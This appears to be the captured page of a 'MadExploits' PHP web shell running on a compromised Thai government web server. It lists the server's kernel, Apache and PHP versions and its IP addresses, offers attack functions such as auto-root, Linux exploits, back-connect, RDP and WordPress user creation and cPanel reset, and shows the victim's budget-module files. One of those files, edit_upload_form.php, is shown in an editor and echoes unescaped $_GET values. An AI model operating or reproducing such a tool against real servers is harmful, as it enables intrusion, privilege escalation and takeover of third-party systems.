Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
budget /
budget_unit /
[ HOME SHELL ]
Name
Size
Permission
Action
detail
[ DIR ]
drwxrwxrwx
edit_receive_form.php
11.72
KB
-rwxr-xr-x
edit_upload.php
2.68
KB
-rwxr-xr-x
edit_upload_form.php
1.29
KB
-rwxr-xr-x
receive.php
10.59
KB
-rwxr-xr-x
receive_detail.php
6.19
KB
-rwxr-xr-x
receive_form.php
7.08
KB
-rwxr-xr-x
receive_print.php
5.82
KB
-rwxr-xr-x
receive_report.php
11.86
KB
-rwxr-xr-x
receive_upload.php
2.36
KB
-rwxr-xr-x
receive_upload_form.php
1.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_upload_form.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); echo "<form Enctype = multipart/form-data name='frm1' onsubmit='return Conf(this);'>"; echo "<BR><div align='center'><strong><font color='#003366' size='4'>Upload เอกสาร</font></strong></div><BR>"; echo "<hr><BR><BR>"; echo "<table align ='center' width='45%' border='0'>"; echo "<tr>"; echo "<td align = 'right'> <strong><font color='#003366' size='3'>ไฟล์เอกสาร </font></strong></td>"; echo "<td> <input type = 'file' name = 'userfile' id= 'file'></td>"; echo "</tr>"; echo "<tr> "; echo "<td><input type = 'hidden' name = 'max_file_size' value = '2000000'><input type ='hidden' name = 'id' value =$_GET[id]><input type ='hidden' name = 'page' value =$_GET[page]></td>"; echo "<td> </td>"; echo "</tr>"; echo "<tr> "; echo "<td> </td>"; echo "<td align ='left'> <Input Type='button' name='smb' value='ตกลง' onclick='return Conf(this)'></td>"; echo "</tr>"; echo "</table>"; echo "</form>"; ?> <script language="javascript"> function Conf(Object) { callfrm("?option=budget&task=budget_unit/edit_upload"); } </script>
Close